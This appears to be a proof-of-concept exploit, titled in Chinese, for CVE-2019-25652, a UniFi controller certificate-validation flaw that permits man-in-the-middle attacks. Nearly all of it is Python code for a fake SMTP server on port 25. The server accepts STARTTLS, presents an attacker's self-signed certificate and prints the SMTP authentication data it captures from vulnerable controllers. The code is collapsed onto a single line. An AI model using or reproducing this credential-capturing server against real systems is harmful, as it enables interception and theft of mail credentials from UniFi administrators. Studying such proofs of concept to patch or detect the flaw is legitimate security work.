CVE-2019-25652 UniFi证书验证漏洞导致MITM

# Proof of Concept for CVE-2019-25652 # This script simulates a malicious SMTP server to intercept traffic. # Requires Python and ssl module. import socket import ssl import threading # Fake SMTP Server to exploit CVE-2019-25652 # This script listens on port 25 and accepts SSL connections # to capture credentials from the vulnerable controller. def handle_client(client_socket): try: # Send SMTP greeting client_socket.send(b"220 fake.smtp.server ESMTP Postfix\r\n") while True: data = client_socket.recv(1024) if not data: break print(f"[+] Received: {data.decode().strip()}") # Simple SMTP responses to capture AUTH if b"EHLO" in data: client_socket.send(b"250-fake.smtp.server\n250 STARTTLS\r\n") elif b"STARTTLS" in data: client_socket.send(b"220 Ready to start TLS\r\n") # Wrap socket with SSL using a dummy cert # In a real attack, use openssl to generate a cert context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER) # Load attacker's self-signed certificate try: context.load_cert_chain('cert.pem', 'key.pem') except: print("[-] Cert files not found, using default context (might fail)") secure_socket = context.wrap_socket(client_socket, server_side=True) print("[+] TLS Handshake established. Intercepting...") # Read encrypted traffic (AUTH PLAIN/LOGIN) while True: d = secure_socket.recv(1024) if not d: break print(f"[+] Captured Auth Data: {d.decode().strip()}") break else: client_socket.send(b"500 Command unrecognized\r\n") except Exception as e: print(f"[-] Error: {e}") finally: client_socket.close() # Start listener server = socket.socket(socket.AF_INET, socket.SOCK_STREAM) server.bind(("0.0.0.0", 25)) server.listen(5) print("[*] Listening on port 25 for vulnerable UniFi Controller connections...") while True: client, addr = server.accept() print(f"[*] Accepted connection from {addr}") threading.Thread(target=handle_client, args=(client,)).start()